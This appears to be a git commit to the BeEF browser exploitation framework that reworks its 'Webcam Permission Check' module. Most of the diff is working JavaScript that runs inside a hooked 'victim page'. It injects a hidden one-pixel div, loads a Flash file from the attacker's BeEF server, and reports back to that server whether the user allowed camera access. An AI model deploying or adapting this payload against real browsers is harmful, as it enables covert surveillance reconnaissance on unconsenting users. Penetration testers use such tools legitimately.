xntriks updates to webcam_perm_check

2013-04-06 14:32:51 +08:00
parent cca21f1003
commit 2fcdf1038d
3 changed files with 53 additions and 12 deletions
--- a/modules/browser/webcam_permision_check/command.js
+++ b/modules/browser/webcam_permision_check/command.js
@@ -12,24 +12,64 @@ beef.execute(function() {
    //					 yesPermissions() The user is allowing access to the camera / mic
    //					yesPermissions() The user has not allowed access to the camera / mic
    // Flash will invoke these functions directly.
-    var js_functions = '<script>function noPermissions() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has not allowed  BeEF to access the camera :("); }; function yesPermissions() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has  allowed  BeEF to access the camera :D"); }; function naPermissions() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Camera not supported / available :/"); }; ';
-    
+    //var js_functions = '<script>function noPermissions() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has not allowed  BeEF to access the camera :("); }; function yesPermissions() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has  allowed  BeEF to access the camera :D"); }; function naPermissions() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Camera not supported / available :/"); }; ';
+
    //This function is called by swfobject, if if fails to add the flash file to the page
    
-    js_functions += 'function swfobjectCallback(e) { if(e.success){beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject successfully added flash object to the victim page");}else{beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject was not able to add the swf file to the page. This could mean there was no flash plugin installed.");} };</script>';
-    
+    //js_functions += 'function swfobjectCallback(e) { if(e.success){beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject successfully added flash object to the victim page");}else{beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject was not able to add the swf file to the page. This could mean there was no flash plugin installed.");} };</script>';
+
+    //These functions are global so they can accessed by the cameraCheck.swf file
+
+    noPermissions = function() {
+        beef.net.send("<%= @command_url %>",<%= @command_id %>,"result=The user has not allowed BeEF to access the camera :(");
+    }
+
+    yesPermissions = function() {
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has  allowed  BeEF to access the camera :D");
+    }
+
+    naPermissions = function() {
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Camera not supported / available :/&unmount=true");
+    }
+
+    //After the swfobject loads the SWF file, this callback sends a status back to BeEF
+
+    var swfobjectCallback = function(e) {
+        if(e.success){
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject successfully added flash object to the victim page");
+        } else {
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject was not able to add the swf file to the page. This could mean there was no flash plugin installed.");
+        }
+    }
+
+
+    //This is the DIV for the flash object
    
    var body_flash_container = '<div id="main" style="position:absolute;top:150px;left:80px;width:1px;height:1px;opacity:0.8;"></div>';
+    $j('body').append(body_flash_container);
+
+    // Lets execute swfobject.js
+    // If it works, we then run it to embed the swf file into the above div
+    $j.getScript(beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/swfobject.js',function(data,txtStatus,jqxhr) {
+        var flashvars = {};
+        var parameters = {};
+        parameters.scale = "noscale";
+        parameters.wmode = "opaque";
+        parameters.allowFullScreen = "true";
+        parameters.allowScriptAccess = "always";
+        var attributes = {};
+        swfobject.embedSWF(beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/cameraCheck.swf', "main", "1", "1", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);
+    });
        
    //A library that helps include the swf file
-    var swfobject_script = '<script type="text/javascript" src="http://'+beef.net.host+':'+beef.net.port+'/swfobject.js"></script>'
+    //var swfobject_script = '<script type="text/javascript" src="http://'+beef.net.host+':'+beef.net.port+'/swfobject.js"></script>'
    
    //This is the javascript that actually calls the swfobject library to include the swf file 
-    var include_script = '<script>var flashvars = {}; var parameters = {}; parameters.scale = "noscale"; parameters.wmode = "opaque"; parameters.allowFullScreen = "true"; parameters.allowScriptAccess = "always"; var attributes = {}; swfobject.embedSWF("http://'+beef.net.host+':'+beef.net.port+'/cameraCheck.swf", "main", "1", "1", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);</script>';
+    //var include_script = '<script>var flashvars = {}; var parameters = {}; parameters.scale = "noscale"; parameters.wmode = "opaque"; parameters.allowFullScreen = "true"; parameters.allowScriptAccess = "always"; var attributes = {}; swfobject.embedSWF("http://'+beef.net.host+':'+beef.net.port+'/cameraCheck.swf", "main", "1", "1", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);</script>';
    

    //Add flash content
-    $j('body').append(js_functions, swfobject_script, body_flash_container, include_script);
+    //$j('body').append(js_functions, swfobject_script, body_flash_container, include_script);
    
 });

--- a/modules/browser/webcam_permision_check/config.yaml
+++ b/modules/browser/webcam_permision_check/config.yaml
@@ -5,7 +5,7 @@
 #
 beef:
    module:
-        wb:
+        webcam_permission_check:
            enable: true
            category: "Browser"
            name: "Webcam Permission Check"
--- a/modules/browser/webcam_permision_check/module.rb
+++ b/modules/browser/webcam_permision_check/module.rb
@@ -4,14 +4,15 @@
 # See the file 'doc/COPYING' for copying permission
 #

-class Wb < BeEF::Core::Command
+class Webcam_permission_check < BeEF::Core::Command
  def pre_send
-      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/wb/cameraCheck.swf', '/cameraCheck', 'swf')
-      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/wb/swfobject.js', '/swfobject', 'js')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_permission_check/cameraCheck.swf', '/cameraCheck', 'swf')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_permission_check/swfobject.js', '/swfobject', 'js')
  end
  
  def post_execute 
-    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/cameraCheck.swf')
+
+  	BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/cameraCheck.swf')
 	BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/swfobject.js')
  end